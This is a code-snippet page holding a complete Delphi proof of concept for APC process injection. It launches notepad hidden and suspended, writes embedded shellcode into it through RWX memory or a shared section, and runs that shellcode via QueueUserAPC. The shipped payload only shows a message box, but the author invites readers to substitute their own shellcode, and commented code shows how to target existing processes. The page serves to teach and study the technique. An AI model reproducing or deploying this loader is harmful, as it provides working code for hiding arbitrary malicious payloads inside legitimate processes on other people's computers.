(Delphi) APC injection by Jean-Pierre LESUEUR (DarkCoderSc)
Created the Wednesday 07 September 2022. Updated 3 days, 7 hours ago.
Description:
This code demonstrate how to use QueueUserAPC to run code in a remote process.
PoC Steps:
- Create a new process in suspended state.
Method N°1: * Allocate RWX memory in remote process to host our shellcode. * Copy shellcode to new memory location.
Method N°2: * Create a new memory section. * Map new memory section to current process. * Share new memory section with target process. * Copy shellcode to shared memory location.
- Implement our shellcode to target process main thread APC queue.
- Resume target process main thread to execute our shellcode.
⚠️ Embedded shellcode will show a message box on behalf of target process. It is harmless but I always recommend to avoid blindly running shellcode you may find in proof of concepts. Feel free to patch both x86-32 / x86-64 version with your own version.
Code
// Support both x86-32 and x86-64
program APCInjector;
{$APPTYPE CONSOLE}
{$R *.res}
uses
System.SysUtils,
WinAPI.Messages,
WinAPI.Windows;
type
EWindowsException = class(Exception)
private
FLastError : Integer;
public
{@C}
constructor Create(const WinAPI : String); overload;
{@G}
property LastError : Integer read FLastError;
end;
const STATUS_SUCCESS = NTSTATUS($0);
THREAD_SET_CONTEXT = $10;
THREAD_SUSPEND_RESUME = $2;
ViewShare = 1;
ViewUnmap = 2;
type
SECTION_INHERIT = ViewShare..ViewUnmap;
ARCH_ULONG = {$IFDEF WIN64} ULONG64 {$ELSE} ULONG {$ENDIF};
ARCH_PULONG = {$IFDEF WIN64} PULONG64 {$ELSE} PULONG {$ENDIF};
function NtCreateSection(
SectionHandle : PHandle;
DesiredAccess : ACCESS_MASK;
ObjectAttributes : Pointer;
SectionSize : PLargeInteger;
Protect : ULONG;
Attributes : ULONG;
FileHandle : THandle
): NTSTATUS; stdcall; external 'ntdll.dll';
function NtMapViewOfSection(
SectionHandle : THandle;
ProcessHandle : THandle;
BaseAddress : PPVOID;
ZeroBits : ARCH_ULONG;
CommitSize : ARCH_ULONG;
SectionOffset : PLargeInteger;
ViewSize : ARCH_PULONG;
InheritDisposition : SECTION_INHERIT;
AllocationType : ARCH_ULONG;
Protect : ARCH_ULONG
): NTSTATUS; stdcall; external 'ntdll.dll';
function NtUnmapViewOfSection(
ProcessHandle : THandle;
BaseAddress : PVOID
): NTSTATUS; stdcall; external 'ntdll.dll';
function NtClose(
Handle : THandle
): NTSTATUS; stdcall; external 'ntdll.dll';
function NtTestAlert(): DWORD; stdcall; external 'ntdll.dll';
function OpenThread(
dwDesiredAccess : DWORD;
bInheritHandle : BOOL;
dwThreadId : DWORD
): DWORD; stdcall; external 'kernel32.dll';
constructor EWindowsException.Create(const WinAPI : String);
var AFormatedMessage : String;
begin
FLastError := GetLastError();
AFormatedMessage := Format('___%s: last_err=%d, last_err_msg="%s".', [
WinAPI,
FLastError,
SysErrorMessage(FLastError)
]);
///
inherited Create(AFormatedMessage);
end;
var // hWindow : THandle;
// AProcessId : Cardinal;
// AThreadId : Integer;
hThread : THandle;
// hRemoteProcess : THandle;
pRemotePayloadAddress : Pointer;
hProcess : THandle;
AStartupInfo : TStartupInfo;
AProcessInfo : TProcessInformation;
{$IFDEF WIN64}
// Execute a messagebox in target process (x86-64)
const PAYLOAD : array[0..284-1] of byte = (
$fc, $48, $81, $e4, $f0, $ff, $ff, $ff, $e8, $d0, $00, $00, $00, $41, $51,
$41, $50, $52, $51, $56, $48, $31, $d2, $65, $48, $8b, $52, $60, $3e, $48,
$8b, $52, $18, $3e, $48, $8b, $52, $20, $3e, $48, $8b, $72, $50, $3e, $48,
$0f, $b7, $4a, $4a, $4d, $31, $c9, $48, $31, $c0, $ac, $3c, $61, $7c, $02,
$2c, $20, $41, $c1, $c9, $0d, $41, $01, $c1, $e2, $ed, $52, $41, $51, $3e,
$48, $8b, $52, $20, $3e, $8b, $42, $3c, $48, $01, $d0, $3e, $8b, $80, $88,
$00, $00, $00, $48, $85, $c0, $74, $6f, $48, $01, $d0, $50, $3e, $8b, $48,
$18, $3e, $44, $8b, $40, $20, $49, $01, $d0, $e3, $5c, $48, $ff, $c9, $3e,
$41, $8b, $34, $88, $48, $01, $d6, $4d, $31, $c9, $48, $31, $c0, $ac, $41,
$c1, $c9, $0d, $41, $01, $c1, $38, $e0, $75, $f1, $3e, $4c, $03, $4c, $24,
$08, $45, $39, $d1, $75, $d6, $58, $3e, $44, $8b, $40, $24, $49, $01, $d0,
$66, $3e, $41, $8b, $0c, $48, $3e, $44, $8b, $40, $1c, $49, $01, $d0, $3e,
$41, $8b, $04, $88, $48, $01, $d0, $41, $58, $41, $58, $5e, $59, $5a, $41,
$58, $41, $59, $41, $5a, $48, $83, $ec, $20, $41, $52, $ff, $e0, $58, $41,
$59, $5a, $3e, $48, $8b, $12, $e9, $49, $ff, $ff, $ff, $5d, $49, $c7, $c1,
$30, $00, $00, $00, $3e, $48, $8d, $95, $fe, $00, $00, $00, $3e, $4c, $8d,
$85, $0b, $01, $00, $00, $48, $31, $c9, $41, $ba, $45, $83, $56, $07, $ff,
$d5, $48, $31, $c9, $41, $ba, $f0, $b5, $a2, $56, $ff, $d5, $48, $65, $6c,
$6c, $6f, $2c, $20, $57, $6f, $72, $6c, $64, $00, $42, $6f, $6f, $00
);
{$ELSE}
// Execute a messagebox in target process (x86-32)
const PAYLOAD : array[0..236-1] of byte = (
$d9, $eb, $9b, $d9, $74, $24, $f4, $31, $d2, $b2, $77, $31, $c9, $64, $8b,
$71, $30, $8b, $76, $0c, $8b, $76, $1c, $8b, $46, $08, $8b, $7e, $20, $8b,
$36, $38, $4f, $18, $75, $f3, $59, $01, $d1, $ff, $e1, $60, $8b, $6c, $24,
$24, $8b, $45, $3c, $8b, $54, $28, $78, $01, $ea, $8b, $4a, $18, $8b, $5a,
$20, $01, $eb, $e3, $34, $49, $8b, $34, $8b, $01, $ee, $31, $ff, $31, $c0,
$fc, $ac, $84, $c0, $74, $07, $c1, $cf, $0d, $01, $c7, $eb, $f4, $3b, $7c,
$24, $28, $75, $e1, $8b, $5a, $24, $01, $eb, $66, $8b, $0c, $4b, $8b, $5a,
$1c, $01, $eb, $8b, $04, $8b, $01, $e8, $89, $44, $24, $1c, $61, $c3, $b2,
$04, $29, $d4, $89, $e5, $89, $c2, $68, $8e, $4e, $0e, $ec, $52, $e8, $9f,
$ff, $ff, $ff, $89, $45, $04, $68, $6c, $6c, $20, $41, $68, $33, $32, $2e,
$64, $68, $75, $73, $65, $72, $30, $db, $88, $5c, $24, $0a, $89, $e6, $56,
$ff, $55, $04, $89, $c2, $50, $bb, $a8, $a2, $4d, $bc, $87, $1c, $24, $52,
$e8, $70, $ff, $ff, $ff, $68, $42, $6f, $6f, $58, $31, $db, $88, $5c, $24,
$03, $89, $e3, $68, $58, $20, $20, $20, $68, $6f, $72, $6c, $64, $68, $6f,
$2c, $20, $57, $68, $48, $65, $6c, $6c, $31, $c9, $88, $4c, $24, $0c, $89,
$e1, $31, $d2, $6a, $30, $53, $51, $52, $ff, $d0, $90
);
{$ENDIF}
{ Inject_WriteProcessMemory
This method use the classic WriteProcessMemory method to inject our payload to remote process }
function Inject_WriteProcessMemory(const hProcess : THandle; const pBuffer : PVOID; const ABufferSize : Cardinal) : Pointer;
var ABytesWritten : SIZE_T;
pAddress : Pointer;
begin
result := nil;
///
if not Assigned(pBuffer) or (AbufferSize = 0) then
exit();
pAddress := VirtualAllocEx(hProcess, nil, ABufferSize, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if not Assigned(pAddress) then
raise EWindowsException.Create('VirtualAllocEx');
///
if not WriteProcessMemory(hProcess, pAddress, pBuffer, ABufferSize, ABytesWritten) then
raise EWindowsException.Create('WriteProcessMemory');
///
result := pAddress;
end;
function MapViewOfSection(const ASectionHandle, hProcess : THandle; const ASectionSize : ULONG; const AInherit : SECTION_INHERIT) : Pointer;
var ANTStatus : NTSTATUS;
pSectionAddress : Pointer;
begin
pSectionAddress := nil;
ANTStatus := NtMapViewOfSection(
ASectionHandle,
hProcess,
@pSectionAddress,
0,
0,
nil,
@ASectionSize,
AInherit,
0,
PAGE_EXECUTE_READWRITE
);
if ANTStatus <> STATUS_SUCCESS then
raise Exception.Create(Format('NtMapViewOfSection failed, NTStatus=[%d]', [ANTStatus]));
///
result := pSectionAddress;
end;
{ Inject_SharedSection
This method used a shared section to inject our payload to a remote process }
function Inject_SharedSection(const hProcess : THandle; const pBuffer : PVOID; const ABufferSize : Cardinal) : Pointer;
var ANTStatus : NTSTATUS;
ASectionHandle : THandle;
pLocalSectionAddress : Pointer;
pRemoteSectionAddress : Pointer;
ASectionSize : TLargeInteger;
begin
result := nil;
///
ASectionSize := ABufferSize;
ASectionHandle := 0;
pLocalSectionAddress := nil;
try
// Create a new memory section
ANTStatus := NtCreateSection(
@ASectionHandle,
SECTION_MAP_READ or SECTION_MAP_WRITE or SECTION_MAP_EXECUTE,
nil,
@ASectionSize,
PAGE_EXECUTE_READWRITE,
SEC_COMMIT,
0
);
if ANTStatus <> STATUS_SUCCESS then
raise Exception.Create(Format('NtCreateSection failed, NTStatus=[%d]', [ANTStatus]));
///
// Map new section and share it with target process
pLocalSectionAddress := MapViewOfSection(ASectionHandle, GetCurrentProcess(), ABufferSize, ViewUnmap);
pRemoteSectionAddress := MapViewOfSection(ASectionHandle, hProcess, ABufferSize, ViewShare);
// Copy our payload to our new section
CopyMemory(pLocalSectionAddress, pBuffer, ABufferSize);
finally
// Unmap section for current process
if Assigned(pLocalSectionAddress) then
NtUnmapViewOfSection(GetCurrentProcess(), pLocalSectionAddress);
// Close section for our current process
if ASectionHandle <> 0 then
NtClose(ASectionHandle);
end;
///
result := pRemoteSectionAddress; // Return payload location in remote process
end;
begin
try
(*
// Bellow code demonstrate how to use FindWindow + GetWindowThreadProcessId and
// OpenProcess to achieve the same result in an existing process.
// Bellow method when possible is interesting to avoid iterating on threads.
// Get target process handle from its window handle
hWindow := FindWindowW(nil, 'PEView - Untitled');
if hWindow = 0 then
raise Exception.Create('Could not find window handle.');
///
// Get target process identifier from its window handle
AThreadId := GetWindowThreadProcessId(hWindow, AProcessId);
if AProcessId = 0 then
raise EWindowsException.Create('GetWindowThreadProcessId');
///
// Open target process
hRemoteProcess := OpenProcess(PROCESS_VM_OPERATION or PROCESS_VM_WRITE, false, AProcessId);
if hRemoteProcess = 0 then
raise EWindowsException.Create('OpenProcess');
// hThread := OpenThread(THREAD_SET_CONTEXT or THREAD_SUSPEND_RESUME, False, AProcessInfo.hThread);
// if hThread = 0 then
// raise EWindowsException.Create('OpenThread');
*)
ZeroMemory(@AProcessInfo, SizeOf(TProcessInformation));
ZeroMemory(@AStartupInfo, Sizeof(TStartupInfo));
AStartupInfo.cb := SizeOf(TStartupInfo);
AStartupInfo.wShowWindow := SW_HIDE;
AStartupInfo.dwFlags := (STARTF_USESHOWWINDOW);
if not CreateProcessW(
'c:\Windows\notepad.exe', // Edit here accordingly
nil, // Edit here accordingly
nil,
nil,
False,
CREATE_SUSPENDED,
nil,
nil,
AStartupInfo,
AProcessInfo
) then
raise EWindowsException.Create('CreateProcessW');
try
try
// Alternatively you can comment "Inject_SharedSection" and use "Inject_WriteProcessMemory" instead.
pRemotePayloadAddress := Inject_SharedSection(AProcessInfo.hProcess, @PAYLOAD, Length(PAYLOAD));
// pRemotePayloadAddress := Inject_WriteProcessMemory(AProcessInfo.hProcess, @PAYLOAD, Length(PAYLOAD));
if not Assigned(pRemotePayloadAddress) then
raise Exception.Create('Could not inject buffer to remote process.');
if not QueueUserAPC(pRemotePayloadAddress, AProcessInfo.hThread, 0) then
raise EWindowsException.Create('QueueUserAPC');
ResumeThread(AProcessInfo.hThread);
finally
CloseHandle(hThread);
end;
finally
CloseHandle(AProcessInfo.hThread);
end;
except
on E: Exception do
Writeln(E.ClassName, ': ', E.Message);
end;
end.